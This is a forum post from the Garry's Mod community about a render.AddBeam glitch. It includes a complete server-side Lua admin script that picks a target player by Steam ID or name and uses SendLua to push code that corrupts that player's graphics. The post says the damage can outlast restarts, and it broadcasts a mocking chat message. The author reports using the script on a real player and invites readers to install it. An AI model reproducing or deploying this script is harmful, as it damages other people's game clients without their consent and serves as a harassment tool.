I’m not sure if this really counts as an exploit; it’s more like a glitch, but here we go anyways.
As you may have heard, the misuse of the **[Render.AddBeam
http://wiki.garrysmod.com/favicon.ico](http://wiki.garrysmod.com/?title=Render.AddBeam)** function can pretty much break map rendering for the client in GMod. Some surfaces won’t render, some render in the wrong places, and everything is a fucked up mess of graphics-rape. Looks to me like GMod took the map and stirred up all the visleaves.
[img_thumb]http://img52.imageshack.us/img52/2821/gmconstruct0012.jpg[/img_thumb] [img_thumb]http://img69.imageshack.us/img69/3342/gmconstruct0015e.jpg[/img_thumb] [img_thumb]http://img651.imageshack.us/img651/9130/gmconstruct0016.jpg[/img_thumb] [img_thumb]http://img29.imageshack.us/img29/8684/gmconstruct0038l.jpg[/img_thumb] [img_thumb]http://img11.imageshack.us/img11/5558/gmconstruct0050o.jpg[/img_thumb] [img_thumb]http://img532.imageshack.us/img532/8721/gmconstruct0049.jpg[/img_thumb] [img_thumb]http://img63.imageshack.us/img63/6727/gmconstruct0051.jpg[/img_thumb]
I decided that this called for some on-field testing, so I whipped up a little admin console command and gave the script shown below to a friend who was hosting an RP server. His server was constantly being bombarded by minges who were reconnecting with a Steam ID changer, so I figured that it would be perfect testing grounds for something like this.
Results were pretty satisfactory to say the least. One person threatened to DDOS the server, so we used this on him and it totally fried his graphics. He went bat-shit crazy.
// Exploit exploited by Grea$eMonkey and all who decide to make use of this.
// This is a little glitch in the render library that I found.
// Syntax: sv_breakclientgraphics “steamid_or_name” numIterations
// The more iterations performed, the more messed up the victim’s graphics will be.
// Be sure you have the steamid/name in quotes, otherwise this won’t work!
local consoleStartupMessage = [[
Initializing render.AddBeam exploit script - By Grea$eMonkey
Console Command Syntax: sv_breakclientgraphics “steamid_or_name” numIterations
The more iterations performed, the more messed up the victim’s graphics will be.
Be sure you have the steamid/name in quotes, otherwise this won’t work!
Have fun breaking people’s graphics!
hook.Add(“PlayerInitialSpawn”, “breakClientGraphicsInit”, function(ply)
if ply:IsAdmin() then
function BreakClientsGraphics(ply, cmd, args)
if !ply:IsAdmin() then return end local victim = NULL local rep = tonumber(args) if !rep or rep == 0 then rep = 1 end for k, v in pairs(player.GetAll()) do if v:SteamID() == args then victim = v print("Victim found by Steam ID: "..tostring(victim)) break end if string.find(v:Nick(), args) then victim = v print("Victim found by Name: "..tostring(victim)) break end end if victim:IsValid() and victim:IsPlayer() then local breakCode1 = [[ render.StartBeam(100) for i = 1, ]] local breakCode2 = [[ do render.AddBeam( nil, 32, CurTime() + 1, color_white ) end render.EndBeam() ]] local noteCode1 = [[ chat.AddText( Color(255,255,255), "Mingebag ", Color(255,0,0), "]] local noteCode2 = [[", Color(255,255,255), " graphics were raped by a ", Color(30,30,200), "Server Administrator." ) chat.PlaySound() ]] ply:ChatPrint("Sending code to "..victim:Nick().." with a power of "..rep.." repeat"..(rep > 1 and "s").."!") for k, v in pairs(player.GetAll()) do v:SendLua( noteCode1..victim:Nick().."'s"..noteCode2 ) end victim:SendLua( breakCode1 .. rep .. breakCode2 ) else ply:ChatPrint("The player you entered was not a valid player") end
[li]This “exploit” is caused by using a nil value for the first argument of Render.AddBeam[/li]
http://wiki.garrysmod.com/favicon.ico which is supposed to be a Vector.
[li]The more invalid beams you add, the more fucked up the client’s graphics will get. I tried out 100 iterations, and I could barely see anything. GMod crashed shortly after.[/li][li]If you disconnect and join any server, you’re graphics will remain this way. Sometimes restarting GMod doesn’t even fix it.[/li][li]Adding -config to your startup supposedly fixes it. You’ll still need to restart GMod though.[/li][/ul]
If you want to use this script, just put it in your lua/autorun/server folder and give it a spin. It’s pretty cruel to use on people, but it certainly is an effective tool against persistent mingebags.
Garry, you may want to fix this at some point.